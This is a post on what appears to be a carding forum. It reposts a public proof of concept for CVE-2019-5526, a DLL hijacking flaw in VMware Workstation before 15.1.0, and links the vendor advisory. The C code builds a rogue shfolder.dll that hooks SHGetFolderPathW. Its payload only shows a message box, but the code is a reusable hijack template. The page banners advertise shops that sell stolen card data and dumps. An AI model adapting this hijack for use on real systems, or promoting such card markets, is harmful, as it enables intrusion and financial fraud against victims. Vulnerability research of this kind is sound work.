Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!
adv ex on 5 january 2024
adv ex on 22 February 2024
Kfc Club

Patrick Stash
banner Expire 26 October 2024
Rescator cvv and dump shop
banner expire at 13 May

Yale lodge shop
UniCvv
banner Expire 1 April  2021

VMWARE WORKSTATION DLL HIJACKING

ALBERT

TRUSTED VENDOR
Staff member
Joined
Dec 3, 2020
Messages
1,357
VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.

MD5 | e4ae43fff5271c25af6a88e2b9cdeb55
Download

Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------
Click to expand...
Click to expand...

Click to expand...
https://www.vmware.com/security/advisories/VMSA-2019-0007.html
 
Top Bottom